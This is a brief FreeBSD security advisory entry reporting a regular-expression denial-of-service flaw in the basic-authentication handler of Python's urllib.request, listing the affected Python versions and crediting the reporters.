Python -- Regular Expression DoS attack against client

2019-11-17T00:00:00
ID A27B0BB6-84FC-11EA-B5B4-641C67A117D8
Type freebsd
Reporter FreeBSD
Modified 2020-06-13T00:00:00

Description

Ben Caller and Matt Schwager reports:

Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking.